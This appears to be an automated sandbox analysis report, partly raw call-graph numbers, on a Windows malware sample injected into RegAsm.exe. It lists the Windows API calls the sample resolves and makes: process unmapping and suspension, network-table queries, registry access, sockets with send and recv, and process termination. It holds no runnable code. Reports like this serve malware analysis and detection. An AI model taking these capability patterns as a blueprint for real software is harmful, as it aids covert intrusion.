48419->48421 48420 4032c9 48420->47975 48421->48420 48423 4028e8 28 API calls 48421->48423 48423->48420 48425 4051fb 48424->48425 48434 405274 48425->48434 48427 405208 48427->47978 48429 402061 48428->48429 48430 4023ce 11 API calls 48429->48430 48431 40207b 48430->48431 48458 40267a 48431->48458 48435 405282 48434->48435 48436 405288 48435->48436 48437 40529e 48435->48437 48445 4025f0 48436->48445 48439 4052f5 48437->48439 48440 4052b6 48437->48440 48455 4028a4 22 API calls 48439->48455 48444 40529c 48440->48444 48454 4028e8 28 API calls 48440->48454 48444->48427 48446 402888 22 API calls 48445->48446 48447 402602 48446->48447 48448 402672 48447->48448 48449 402629 48447->48449 48457 4028a4 22 API calls 48448->48457 48453 40263b 48449->48453 48456 4028e8 28 API calls 48449->48456 48453->48444 48454->48444 48456->48453 48459 40268b 48458->48459 48460 4023ce 11 API calls 48459->48460 48461 40208d 48460->48461 48461->47981 48462->47989 48463->47994 48466 41b362 48465->48466 48467 41c055 GetCurrentProcess 48465->48467 48468 4135e1 RegOpenKeyExA 48466->48468 48467->48466 48469 41360f RegQueryValueExA RegCloseKey 48468->48469 48470 413639 48468->48470 48469->48470 48471 402093 28 API calls 48470->48471 48472 41364e 48471->48472 48472->48005 48473->48013 48475 40b947 48474->48475 48480 402252 48475->48480 48477 40b952 48484 40b967 48477->48484 48479 40b961 48479->48024 48481 4022ac 48480->48481 48482 40225c 48480->48482 48481->48477 48482->48481 48491 402779 11 API calls std::_Deallocate 48482->48491 48485 40b9a1 48484->48485 48486 40b973 48484->48486 48503 4028a4 22 API calls 48485->48503 48492 4027e6 48486->48492 48490 40b97d 48490->48479 48491->48481 48493 4027ef 48492->48493 48494 402851 48493->48494 48495 4027f9 48493->48495 48505 4028a4 22 API calls 48494->48505 48498 402802 48495->48498 48499 402815 48495->48499 48504 402aea 28 API calls __EH_prolog 48498->48504 48501 402813 48499->48501 48502 402252 11 API calls 48499->48502 48501->48490 48502->48501 
48504->48501 48506->48027 48508 402347 48507->48508 48509 402252 11 API calls 48508->48509 48510 4023c7 48509->48510 48510->48027 48512 4024f9 48511->48512 48513 40250a 28 API calls 48512->48513 48514 4020b1 48513->48514 48514->47536 48531 43ba8a 48515->48531 48517 43aed0 48518 43a837 _strftime 36 API calls 48517->48518 48523 43aedc 48518->48523 48519 43ae95 48519->48517 48520 43aeaa 48519->48520 48530 43aeaf __wsopen_s 48519->48530 48536 44062d 20 API calls _free 48520->48536 48524 43af0b 48523->48524 48537 43bacf 40 API calls __Tolower 48523->48537 48527 43af77 48524->48527 48538 43ba36 20 API calls 2 library calls 48524->48538 48539 43ba36 20 API calls 2 library calls 48527->48539 48528 43b03e _strftime 48528->48530 48540 44062d 20 API calls _free 48528->48540 48530->48062 48532 43baa2 48531->48532 48533 43ba8f 48531->48533 48532->48519 48541 44062d 20 API calls _free 48533->48541 48535 43ba94 __wsopen_s 48535->48519 48536->48530 48537->48523 48538->48527 48539->48528 48540->48530 48541->48535 48548 401fb0 48542->48548 48544 402f1e 48545 402055 11 API calls 48544->48545 48546 402f2d 48545->48546 48546->48076 48547->48079 48549 4025f0 28 API calls 48548->48549 48550 401fbd 48549->48550 48550->48544 48552 40a162 48551->48552 48553 413584 3 API calls 48552->48553 48554 40a169 48553->48554 48555 40a197 48554->48555 48556 40a17d 48554->48556 48574 409097 28 API calls 48555->48574 48558 40a182 48556->48558 48559 409ed6 48556->48559 48572 409097 28 API calls 48558->48572 48559->47588 48560 40a1a5 48575 40a1b4 86 API calls 48560->48575 48563 40a190 48573 40a268 29 API calls 48563->48573 48565 40a195 48565->48559 48566->48104 48580 403222 48567->48580 48569 403022 48584 403262 48569->48584 48572->48563 48573->48565 48576 40a2ae 163 API calls 48573->48576 48574->48560 48575->48559 48577 40a2a2 86 API calls 48575->48577 48578 40a2c4 48 API calls 48575->48578 48579 40a2b8 128 API calls 48575->48579 48581 40322e 48580->48581 48590 403618 48581->48590 48583 40323b 
48583->48569 48585 40326e 48584->48585 48586 402252 11 API calls 48585->48586 48587 403288 48586->48587 48588 402336 11 API calls 48587->48588 48589 403031 48588->48589 48589->48108 48591 403626 48590->48591 48592 403644 48591->48592 48593 40362c 48591->48593 48595 40365c 48592->48595 48596 40369e 48592->48596 48601 4036a6 28 API calls 48593->48601 48599 4027e6 28 API calls 48595->48599 48600 403642 48595->48600 48602 4028a4 22 API calls 48596->48602 48599->48600 48600->48583 48601->48600 48604 404186 48603->48604 48605 402252 11 API calls 48604->48605 48606 404191 48605->48606 48614 4041bc 48606->48614 48609 4042fc 48626 404353 48609->48626 48611 40430a 48612 403262 11 API calls 48611->48612 48613 404319 48612->48613 48613->48118 48615 4041c8 48614->48615 48618 4041d9 48615->48618 48617 40419c 48617->48609 48619 4041e9 48618->48619 48620 404206 48619->48620 48621 4041ef 48619->48621 48622 4027e6 28 API calls 48620->48622 48625 404267 28 API calls 48621->48625 48624 404204 48622->48624 48624->48617 48625->48624 48627 40435f 48626->48627 48630 404371 48627->48630 48629 40436d 48629->48611 48631 40437f 48630->48631 48632 404385 48631->48632 48633 40439e 48631->48633 48696 4034e6 28 API calls 48632->48696 48634 402888 22 API calls 48633->48634 48635 4043a6 48634->48635 48637 404419 48635->48637 48638 4043bf 48635->48638 48697 4028a4 22 API calls 48637->48697 48641 4027e6 28 API calls 48638->48641 48649 40439c 48638->48649 48641->48649 48649->48629 48696->48649 48704 43ab1a 48698->48704 48702 4138f4 48701->48702 48703 4138ca RegSetValueExA RegCloseKey 48701->48703 48702->48134 48703->48702 48707 43aa9b 48704->48707 48706 40170d 48706->48136 48708 43aaaa 48707->48708 48709 43aabe 48707->48709 48720 44062d 20 API calls _free 48708->48720 48711 43aaaf __alldvrm __wsopen_s 48709->48711 48713 4489d7 48709->48713 48711->48706 48714 44854a _free 5 API calls 48713->48714 48715 4489fe 48714->48715 48716 448a16 GetSystemTimeAsFileTime 48715->48716 48717 448a0a 48715->48717 
48716->48717 48718 43502b __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 48717->48718 48719 448a27 48718->48719 48719->48711 48720->48711 48722 41b98a _Yarn ___scrt_fastfail 48721->48722 48723 402093 28 API calls 48722->48723 48724 414f84 48723->48724 48724->48143 48725->48160 48727 414f33 48726->48727 48728 414f3d getaddrinfo WSASetLastError 48726->48728 48854 414dc1 48727->48854 48728->48189 48732 4020df 11 API calls 48731->48732 48733 41cb86 FormatMessageA 48732->48733 48734 41cba4 48733->48734 48736 41cbb2 48733->48736 48735 402093 28 API calls 48734->48735 48737 41cbb0 48735->48737 48738 41cbbd LocalFree 48736->48738 48740 401fd8 11 API calls 48737->48740 48739 402055 11 API calls 48738->48739 48739->48737 48741 41cbd9 48740->48741 48741->48189 48743 404846 socket 48742->48743 48744 404839 48742->48744 48746 404860 CreateEventW 48743->48746 48747 404842 48743->48747 48893 40489e WSAStartup 48744->48893 48746->48189 48747->48189 48748 40483e 48748->48743 48748->48747 48750 404f65 48749->48750 48751 404fea 48749->48751 48752 404f6e 48750->48752 48753 404fc0 CreateEventA CreateThread 48750->48753 48754 404f7d GetLocalTime 48750->48754 48751->48189 48752->48753 48753->48751 48896 405150 48753->48896 48894 41bc1f 28 API calls 48754->48894 48756 404f91 48895 4052fd 28 API calls 48756->48895 48765 404a1b 48764->48765 48766 4048ee 48764->48766 48767 40497e 48765->48767 48768 404a21 WSAGetLastError 48765->48768 48766->48767 48769 404923 48766->48769 48771 40531e 28 API calls 48766->48771 48767->48189 48768->48767 48770 404a31 48768->48770 48900 420cf1 27 API calls 48769->48900 48772 404932 48770->48772 48773 404a36 48770->48773 48776 40490f 48771->48776 48779 402093 28 API calls 48772->48779 48777 41cb72 30 API calls 48773->48777 48775 40492b 48775->48772 48778 404941 48775->48778 48780 402093 28 API calls 48776->48780 48781 404a40 48777->48781 48788 404950 48778->48788 48789 404987 48778->48789 48782 404a80 48779->48782 48783 40491e 48780->48783 
48911 4052fd 28 API calls 48781->48911 48785 402093 28 API calls 48782->48785 48786 41b580 80 API calls 48783->48786 48790 404a8f 48785->48790 48786->48769 48794 402093 28 API calls 48788->48794 48908 421ad1 54 API calls 48789->48908 48795 41b580 80 API calls 48790->48795 48798 40495f 48794->48798 48795->48767 48796 40498f 48799 4049c4 48796->48799 48800 404994 48796->48800 48802 402093 28 API calls 48798->48802 48910 420e97 28 API calls 48799->48910 48803 402093 28 API calls 48800->48803 48805 40496e 48802->48805 48807 4049a3 48803->48807 48808 41b580 80 API calls 48805->48808 48810 402093 28 API calls 48807->48810 48811 404973 48808->48811 48809 4049cc 48812 4049f9 CreateEventW CreateEventW 48809->48812 48814 402093 28 API calls 48809->48814 48813 4049b2 48810->48813 48901 420d31 48811->48901 48812->48767 48816 41b580 80 API calls 48813->48816 48815 4049e2 48814->48815 48818 402093 28 API calls 48815->48818 48819 4049b7 48816->48819 48820 4049f1 48818->48820 48909 421143 52 API calls 48819->48909 48822 41b580 80 API calls 48820->48822 48823 4049f6 48822->48823 48823->48812 48825 404e40 SetEvent CloseHandle 48824->48825 48826 404e57 closesocket 48824->48826 48827 404ed8 48825->48827 48828 404e64 48826->48828 48827->48189 48829 404e73 48828->48829 48830 404e7a 48828->48830 48914 4050e4 84 API calls 48829->48914 48832 404e8c WaitForSingleObject 48830->48832 48833 404ece SetEvent CloseHandle 48830->48833 48834 420d31 3 API calls 48832->48834 48833->48827 48835 404e9b SetEvent WaitForSingleObject 48834->48835 48836 420d31 3 API calls 48835->48836 48837 404eb3 SetEvent CloseHandle CloseHandle 48836->48837 48837->48833 48838->48189 48840->48189 48841->48189 48842->48189 48843->48189 48844->48207 48845->48207 48846->48207 48847->48207 48848->48207 48849->48207 48850->48207 48851->48207 48852->48207 48853->48207 48855 414e03 GetSystemDirectoryA 48854->48855 48872 414f0a 48854->48872 48856 414e1e 48855->48856 48855->48872 48875 441a8e 48856->48875 48858 414e3a 48882 441ae8 
48858->48882 48860 414e4a LoadLibraryA 48861 414e7d 48860->48861 48862 414e6c GetProcAddress 48860->48862 48864 441a8e ___std_exception_copy 20 API calls 48861->48864 48868 414ece 48861->48868 48862->48861 48863 414e78 FreeLibrary 48862->48863 48863->48861 48865 414e99 48864->48865 48867 441ae8 20 API calls 48865->48867 48866 414ed4 GetProcAddress 48866->48868 48869 414eef FreeLibrary 48866->48869 48870 414ea9 LoadLibraryA 48867->48870 48868->48866 48871 414eed 48868->48871 48868->48872 48869->48871 48870->48872 48873 414ebd GetProcAddress 48870->48873 48871->48872 48872->48728 48873->48868 48874 414ec9 FreeLibrary 48873->48874 48874->48868 48876 441aa9 48875->48876 48877 441a9b 48875->48877 48889 44062d 20 API calls _free 48876->48889 48877->48876 48880 441ac0 48877->48880 48879 441ab1 __wsopen_s 48879->48858 48880->48879 48890 44062d 20 API calls _free 48880->48890 48883 441b04 48882->48883 48885 441af6 48882->48885 48891 44062d 20 API calls _free 48883->48891 48885->48883 48886 441b2d 48885->48886 48888 441b0c __wsopen_s 48886->48888 48892 44062d 20 API calls _free 48886->48892 48888->48860 48889->48879 48890->48879 48891->48888 48892->48888 48893->48748 48894->48756 48899 40515c 102 API calls 48896->48899 48898 405159 48899->48898 48900->48775 48902 41e7a2 48901->48902 48903 420d39 48901->48903 48904 41e7b0 48902->48904 48912 41d8ec DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48902->48912 48903->48767 48913 41e4d2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48904->48913 48907 41e7b7 48908->48796 48909->48811 48910->48809 48912->48904 48913->48907 48914->48830 48917 401f8e 48916->48917 48918 402252 11 API calls 48917->48918 48919 401f99 48918->48919 48919->48248 48919->48249 48919->48251 48920->48255 48921->48282 48922->48281 48923->48270 48924->48274 48925->48280 48926->48309 48931 40f7fd 48929->48931 48930 413584 3 API calls 48930->48931 48931->48930 48932 40f8a1 48931->48932 48934 40f891 Sleep 48931->48934 48951 40f82f 
48931->48951 48965 409097 28 API calls 48932->48965 48934->48931 48937 41bcef 28 API calls 48937->48951 48938 40f8ac 48939 41bcef 28 API calls 48938->48939 48940 40f8b8 48939->48940 48966 41384f 14 API calls 48940->48966 48943 401f09 11 API calls 48943->48951 48944 40f8cb 48945 401f09 11 API calls 48944->48945 48947 40f8d7 48945->48947 48946 402093 28 API calls 48946->48951 48948 402093 28 API calls 48947->48948 48949 40f8e8 48948->48949 48952 4137aa 14 API calls 48949->48952 48950 4137aa 14 API calls 48950->48951 48951->48934 48951->48937 48951->48943 48951->48946 48951->48950 48962 40d0d1 112 API calls ___scrt_fastfail 48951->48962 48963 409097 28 API calls 48951->48963 48964 41384f 14 API calls 48951->48964 48953 40f8fb 48952->48953 48967 41288b TerminateProcess WaitForSingleObject 48953->48967 48955 40f903 ExitProcess 48968 412829 62 API calls 48956->48968 48963->48951 48964->48951 48965->48938 48966->48944 48967->48955 48969 4458c8 48971 4458d3 48969->48971 48972 4458fc 48971->48972 48973 4458f8 48971->48973 48975 448b04 48971->48975 48982 445920 DeleteCriticalSection 48972->48982 48976 44854a _free 5 API calls 48975->48976 48977 448b2b 48976->48977 48978 448b49 InitializeCriticalSectionAndSpinCount 48977->48978 48979 448b34 48977->48979 48978->48979 48980 43502b __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 48979->48980 48981 448b60 48980->48981 48981->48971 48982->48973 48983 40165e 48984 401666 48983->48984 48985 401669 48983->48985 48986 4016a8 48985->48986 48988 401696 48985->48988 48987 43455e new 22 API calls 48986->48987 48989 40169c 48987->48989 48990 43455e new 22 API calls 48988->48990 48990->48989 48991 426cdc 48996 426d59 send 48991->48996 48997 41e04e 48998 41e063 _Yarn ___scrt_fastfail 48997->48998 49010 41e266 48998->49010 49016 432f55 21 API calls ___std_exception_copy 48998->49016 49001 41e277 49004 41e21a 49001->49004 49012 432f55 21 API calls ___std_exception_copy 49001->49012 49003 41e213 ___scrt_fastfail 
49003->49004 49017 432f55 21 API calls ___std_exception_copy 49003->49017 49006 41e2b0 ___scrt_fastfail 49006->49004 49013 4335db 49006->49013 49008 41e240 ___scrt_fastfail 49008->49004 49018 432f55 21 API calls ___std_exception_copy 49008->49018 49010->49004 49011 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 49010->49011 49011->49001 49012->49006 49019 4334fa 49013->49019 49015 4335e3 49015->49004 49016->49003 49017->49008 49018->49010 49020 433509 49019->49020 49021 433513 49019->49021 49020->49015 49021->49020 49025 432f55 21 API calls ___std_exception_copy 49021->49025 49023 433534 49023->49020 49026 4338c8 CryptAcquireContextA 49023->49026 49025->49023 49027 4338e9 CryptGenRandom 49026->49027 49028 4338e4 49026->49028 49027->49028 49029 4338fe CryptReleaseContext 49027->49029 49028->49020 49029->49028 49030 426c6d 49036 426d42 recv 49030->49036

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                                                              • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                                                              • LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                                                              • LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                                                              • LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                                                              • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                                                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                                                              • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                                                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                                                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                                                              • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
                                                                                              • LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
                                                                                              • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
                                                                                              • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                              • API String ID: 4236061018-3687161714

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                                • Part of subcall function 00413584: RegQueryValueExA.KERNEL32 ref: 004135C2
                                                                                                • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                              • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                                                              • ExitProcess.KERNEL32 ref: 0040F905
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                              • String ID: 5.1.1 Pro$override$pth_unenc
                                                                                              • API String ID: 2281282204-2344886030
                                                                                              APIs
                                                                                              • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,00594CC0), ref: 004338DA
                                                                                              • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                                                              • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                                                              • String ID:
                                                                                              • API String ID: 1815803762-0
                                                                                              APIs
                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                                                                              Strings
                                                                                              • GetSystemTimePreciseAsFileTime, xrefs: 004489F2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Time$FileSystem
                                                                                              • String ID: GetSystemTimePreciseAsFileTime
                                                                                              • API String ID: 2086374402-595813830
                                                                                              APIs
                                                                                              • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: NameUser
                                                                                              • String ID:
                                                                                              • API String ID: 2645101109-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: recv
                                                                                              • String ID:
                                                                                              • API String ID: 1507349165-0
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                                                                                • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
